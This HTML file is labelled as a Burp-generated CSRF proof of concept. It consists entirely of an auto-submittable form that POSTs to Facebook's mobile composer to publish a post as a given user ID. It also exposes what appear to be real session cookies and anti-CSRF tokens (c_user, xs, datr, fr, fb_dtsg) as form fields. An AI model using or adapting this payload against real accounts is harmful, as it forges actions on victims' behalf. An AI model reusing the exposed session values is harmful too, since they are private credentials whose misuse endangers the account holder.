<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
	<form method="POST" action="https://d.facebook.com:443/composer/mbasic/?av=100068039280497&eav=AfYK_kOpnFBBMR6DdkthaZeLkiCavO-0yPkC-Ms8EZ82j3QPn3SJdJWA4SmgGJY_GnM&refid=7">
		<input type="text" name="av" value="100068039280497">
		<input type="text" name="eav" value="AfYK_kOpnFBBMR6DdkthaZeLkiCavO-0yPkC-Ms8EZ82j3QPn3SJdJWA4SmgGJY_GnM">
		<input type="text" name="refid" value="7">
		<input type="text" name="m_pixel_ratio" value="1">
		<input type="text" name="_fbp" value="fb.1.1613200416720.1567384342">
		<input type="text" name="sb" value="aGEnYMTqRRncBvhhCsK8AByx">
		<input type="text" name="locale" value="en_US">
		<input type="text" name="x-referer" value="eyJyIjoiL2Vycm9yL2luZGV4LnBocD9lcnI9ZWMma2Vycj0xMzU3MDAxJmtlcnJfc3VtbWFyeT1Mb2clMjBpbiUyMHRvJTIwY29udGludWUma2Vycl9kZXNjcmlwdGlvbj1QbGVhc2UlMjBsb2clMjBpbiUyMHRvJTIweW91ciUyMGFjY291bnQuIiwiaCI6Ii9lcnJvci9pbmRleC5waHA/ZXJyPWVjJmtlcnI9MTM1NzAwMSZrZXJyX3N1bW1hcnk9TG9nJTIwaW4lMjB0byUyMGNvbnRpbnVlJmtlcnJfZGVzY3JpcHRpb249UGxlYXNlJTIwbG9nJTIwaW4lMjB0byUyMHlvdXIlMjBhY2NvdW50LiIsInMiOiJtIn0=">
		<input type="text" name="datr" value="Drj_YKhr_CxVeMCVlcGWcazk">
		<input type="text" name="fr" value="1sHhsgfSuoaeErFYn.AWVk30s_rD5Hg8q_7Ogwq-oXG0w.Bg_B2o.n-.AAA.0.0.Bg_7kA.AWXqOqvPblQ">
		<input type="text" name="c_user" value="100068039280497">
		<input type="text" name="xs" value="33:Ucpdn8pjwDaoNQ:2:1627371776:-1:7720">
		<input type="text" name="wd" value="1349x661">
		<input type="text" name="spin" value="r.1004162836_b.trunk_t.1627371874_s.1_v.2_">
		<input type="text" name="presence" value="C{&quot;t3&quot;:[{&quot;i&quot;:&quot;u.100013692643361&quot;}],&quot;utc3&quot;:1627371993092,&quot;lm3&quot;:&quot;u.100013692643361&quot;,&quot;v&quot;:1}">
		<input type="text" name="fb_dtsg" value="AQFNzFvFLpjMRU4:33:1627371776">
		<input type="text" name="jazoest" value="22009">
		<input type="text" name="privacyx" value="286958161406148">
		<input type="text" name="target" value="100068039280497">
		<input type="text" name="c_src" value="feed">
		<input type="text" name="cwevent" value="composer_entry">
		<input type="text" name="referrer" value="feed">
		<input type="text" name="ctype" value="inline">
		<input type="text" name="cver" value="amber">
		<input type="text" name="rst_icv" value="">
		<input type="text" name="xc_message" value="kvanxa:/">
		<input type="text" name="view_post" value="Post">
		<input type="submit" value="Send">
	</form>
</body>
</html>